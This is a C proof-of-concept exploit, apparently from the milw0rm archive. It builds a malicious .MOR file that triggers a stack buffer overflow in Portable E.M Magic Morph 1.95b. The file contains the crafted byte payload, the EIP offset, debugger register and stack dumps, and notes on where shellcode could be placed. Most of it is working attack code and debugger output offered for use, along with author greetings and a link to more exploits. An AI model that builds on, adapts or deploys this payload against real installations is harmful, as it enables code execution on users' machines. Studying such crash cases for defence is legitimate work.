/*********************************************************************
Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC *
By fl0 fl0w *
"can't stop me/my time is now/your time is up/MY TIME IS NOW !!!!" *
**********************************************************************
/********************************************************************************************************
The EIP offset is at 312 bytes 0x138 HEX *
After you compile and create the .MOR file ,edit it with HEX EDITOR and start counting from the start *
of the file, and you'll have to rezult with 0x138 bytes *
*
I used a technique names "stack spray" to determine the offset. *
*
CPU REGISTERS *
EAX 00000000 *
ECX 33333333 *
EDX 01492288 *
EBX 00000001 *
*
ESP 0012EF7C ASCII "444bbbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa *
````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY *
XXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223 *
EBP 0012F3CC ASCII "````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY *
YYYYYYYYYYYYYYYYXXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223333333333fffffAAAAww44444b *
bbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaa *
*
ESI 00F369B0 *
EDI 00F369B0 *
EIP 41414141 *
*
We control ECX, EIP witch is more than enought to copy what addresess you want in the memory. *
So I go in OLLYDBG at the ESP register and right click ->follow in stack ,I observe that the corruption*
starts at a much lower address. *
This is what ESP points to: *
********************************************************************************************************
*/
/************************
STACK *
0012EF7C 62343434 *
0012EF80 62626262 *
0012EF84 62626262 *
0012EF88 67676262 *
0012EF8C 67676767 *
0012EF90 67676767 *
0012EF94 67676767 *
0012EF98 62676767 *
0012EF9C 61616161 *
0012EFA0 61616161 *
0012EFA4 61616161 *
0012EFA8 61616161 *
0012EFAC 61616161 *
0012EFB0 61616161 *
0012EFB4 61616161 *
0012EFB8 61616161 *
0012EFBC 61616161 *
0012EFC0 61616161 *
0012EFC4 61616161 *
0012EFC8 61616161 *
0012EFCC 60606060 *
0012EFD0 60606060 *
0012EFD4 60606060 *
0012EFD8 60606060 *
0012EFDC 60606060 *
0012EFE0 60606060 *
0012EFE4 60606060 *
0012EFE8 60606060 *
0012EFF0 60606060 *
0012EFF4 60606060 *
0012EFF8 60606060 *
0012EFFC 59595959 *
0012F000 59595959 *
0012F004 59595959 *
0012F008 59595959 *
0012F00C 59595959 *
..................... *
***********************
*/
/*************************************************
You can copy your shellcode starting from here : *
0012EC3C 63636363 *
*
0x12EF80 = 1240960 ->NOT-> A *
*
0x12EC3C = 1240124 ->NOT-> B *
*
A > B *
A - B = 836 = 0x344 *
So the stack gets corrupted a long way from ESP.*
*************************************************
*/
/*************************************************
LOOK OF THE DUMP *
0012EE4C 63 63 63 63 cccc *
0012EE54 63 63 63 63 63 63 63 63 cccccccc *
0012EE5C 32 32 32 32 32 32 32 32 22222222 *
0012EE64 32 33 33 33 33 33 33 33 23333333 *
0012EE6C 33 33 33 66 66 66 66 66 333fffff *
0012EE74 41 41 41 41 77 77 34 34 AAAAww44 *
0012EE7C 34 34 34 62 62 62 62 62 444bbbbb *
0012EE84 62 62 62 62 62 62 67 67 bbbbbbgg *
0012EE8C 67 67 67 67 67 67 67 67 gggggggg *
0012EE94 67 67 67 67 67 67 67 62 gggggggb *
0012EE9C 61 61 61 61 61 61 61 61 aaaaaaaa *
0012EEA4 61 61 61 61 61 61 61 61 aaaaaaaa *
0012EEAC 61 61 61 61 61 61 61 61 aaaaaaaa *
0012EEB4 61 61 61 61 61 61 61 61 aaaaaaaa *
0012EEBC 61 61 61 61 61 61 61 61 aaaaaaaa *
0012EEC4 61 61 61 61 61 61 61 61 aaaaaaaa *
0012EECC 60 60 60 60 60 60 60 60 ```````` *
0012EED4 60 60 60 60 60 60 60 60 ```````` *
0012EEDC 60 60 60 60 60 60 60 60 ```````` *
0012EEE4 60 60 60 60 60 60 60 60 ```````` *
0012EEEC 60 60 60 60 60 60 60 60 ```````` *
0012EEF4 60 60 60 60 60 60 60 60 ```````` *
0012EEFC 59 59 59 59 59 59 59 59 YYYYYYYY *
0012EF04 59 59 59 59 59 59 59 59 YYYYYYYY *
0012EF0C 59 59 59 59 59 59 59 59 YYYYYYYY *
0012EF14 59 59 59 59 59 59 59 59 YYYYYYYY *
0012EF1C 59 59 59 59 59 59 59 59 YYYYYYYY *
0012EF24 59 59 59 59 59 59 59 59 YYYYYYYY *
0012EF2C 58 58 58 58 58 58 58 58 XXXXXXXX *
0012EF34 58 58 58 58 58 58 58 58 XXXXXXXX *
0012EF3C 63 63 63 63 63 63 63 63 cccccccc *
0012EF44 63 63 63 63 63 63 63 63 cccccccc *
0012EF4C 63 63 63 63 63 63 63 63 cccccccc *
0012EF54 63 63 63 63 63 63 63 63 cccccccc *
0012EF5C 32 32 32 32 32 32 32 32 22222222 *
0012EF64 32 33 33 33 33 33 33 33 23333333 *
0012EF6C 33 33 33 66 66 66 66 66 333fffff *
0012EF74 41 41 41 41 77 77 34 34 AAAAww44 *
0012EF7C 34 34 34 62 62 62 62 62 444bbbbb *
0012EF84 62 62 62 62 62 62 67 67 bbbbbbgg *
0012EF8C 67 67 67 67 67 67 67 67 gggggggg *
0012EF94 67 67 67 67 67 67 67 62 gggggggb *
0012EF9C 61 61 61 61 61 61 61 61 aaaaaaaa *
0012EFA4 61 61 61 61 61 61 61 61 aaaaaaaa *
0012EFAC 61 61 61 61 61 61 61 61 aaaaaaaa *
0012EFB4 61 61 61 61 61 61 61 61 aaaaaaaa *
0012EFBC 61 61 61 61 61 61 61 61 aaaaaaaa *
0012EFC4 61 61 61 61 61 61 61 61 aaaaaaaa *
0012EFCC 60 60 60 60 60 60 60 60 ```````` *
0012EFD4 60 60 60 60 60 60 60 60 ```````` *
0012EFDC 60 60 60 60 60 60 60 60 ```````` *
0012EFE4 60 60 60 60 60 60 60 60 ```````` *
0012EFEC 60 60 60 60 60 60 60 60 ```````` *
0012EFF4 60 60 60 60 60 60 60 60 ```````` *
0012EFFC 59 59 59 59 59 59 59 59 YYYYYYYY *
0012F004 59 59 59 59 59 59 59 59 YYYYYYYY *
0012F00C 59 59 59 59 59 59 59 59 YYYYYYYY *
*************************************************
*/
/**************************************************************************************
Hello to all my buddies from insecurity.ro ,skullbox.info ,renslt.org *
Special greetz to OSHO,!_30,str0ke,Carcabot. *
Vizite my website for more bugs ,papers, exploits, pocs and programming techniques. *
http://www.sploitz.10001mb.com *
*************************************************************************************
*/
/*************************************************************************
DEMO *
C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe *
********************************************************************* *
Magic Morph .MOR File Stack Buffer Overflow POC *
The usage is: *
All Credits fl0 fl0w *
*
-f FILE.mor *
**************************************************************************
*
C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe -f TEST *
File DONE ! *
**************************************************************************
*/
/*****************************************************************************************
Technicall details *
This program was compiled with DEV-Cpp and tested with success on MS Windows Xp Sp3 *
You can download the POC allong with debugging details from my website *
Preview ... *
...... *
This folder contains two screenshots from the ollydbg debbugging session, the poc(MM.CPP)*
and the software Portable E.M Magic Morph 1.95b. *
ALL CREDITS GO TO fl0 fl0w for this exploit ! *
http://www.sploitz.10001mb.com/ *
........................... *
******************************************************************************************
*/
//START Algorithm
#include "stdio.h"
#include "string.h"
#include "stdlib.h"
#include "windows.h"
#include "stdint.h"
#include "getopt.h"
typedef struct flo {
uint8_t a;
uint8_t b;
uint8_t c;
}F;
void buildFile(char *fname)
{
uint8_t hexfileP1[] =
{
0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x20, 0x61, 0x6E, 0x64,
0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74, 0x65, 0x66, 0x61, 0x6E,
0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x5C, 0x4D, 0x73,
0x20, 0x73, 0x75, 0x70, 0x72, 0x65, 0x6D, 0x63, 0x79, 0x30, 0x30, 0x30, 0x2E, 0x6A, 0x70, 0x67,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63,
0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63,
0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33,
0x33, 0x33, 0x33, 0x66, 0x66, 0x66, 0x66, 0x66, 0x41, 0x41, 0x41, 0x41, 0x77, 0x77, 0x34, 0x34,
0x34, 0x34, 0x34, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x67, 0x67,
0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x62,
};
uint8_t hexfileP2[] = {
0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,
0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,
0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,
0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60,
0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60,
0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60,
0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59,
0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59,
0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59,
0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,
0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,
0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,
0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,
0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
};
uint8_t hexfileP3[] = {
0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x43, 0x3A, 0x5C, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73,
0x20, 0x61, 0x6E, 0x64, 0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74,
0x65, 0x66, 0x61, 0x6E, 0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74,
0x73, 0x5C, 0x72, 0x6F, 0x6E, 0x61, 0x6C, 0x64, 0x6F, 0x2D, 0x62, 0x72, 0x61, 0x7A, 0x69, 0x6C,
0x2D, 0x77, 0x61, 0x6C, 0x6C, 0x70, 0x61, 0x70, 0x65, 0x72, 0x2E, 0x6A, 0x70, 0x67, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
} ;
FILE *f;
f = fopen(fname ,"wb");
F *Gf;
Gf = (F*)malloc(sizeof(F));
Gf->a = 0x43;
Gf->b = 0x3A;
Gf->c = 0x5C;
uint8_t B[100];
memcpy(B, Gf, sizeof(Gf));
fwrite(B, sizeof(uint8_t), 3, f);
fwrite(hexfileP1, sizeof(uint8_t), sizeof(hexfileP1), f);
fwrite(hexfileP2, sizeof(uint8_t), sizeof(hexfileP2), f);
fwrite(hexfileP3, sizeof(uint8_t), sizeof(hexfileP3), f);
fclose(f);
}
void args(int argc, char *argv[])
{
int file;
int a;
if(a)
while((a = getopt(argc, argv, "f")) != EOF) {
switch(a) {
case 'f':
file = (int)optarg;
break;
default:
exit(-1);
}
}
}
void Usage (char *Name)
{ system("CLS");
printf("*********************************************************************\n");
fprintf ( stdout , "\t\tPortable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC\n");
printf("The usage is:\n");
fprintf ( stdout , "\t\tAll Credits fl0 fl0w\n");
}
void Menu()
{ fprintf(stderr,
"\n"
"\t-f FILE.mor\n"
"*********************************************************************"
"\n");
}
int main(int32_t argc , char *argv[])
{ if(argc < 2) {
Usage(argv[0]);
Menu();
exit(-1);
}
char b[100];
strcpy(b, argv[2]);
strcat(b, ".mor");
buildFile(b);
printf("File DONE !\n");
return 0;
}
//END Algorithm
/ milw0rm.com [2009-09-14]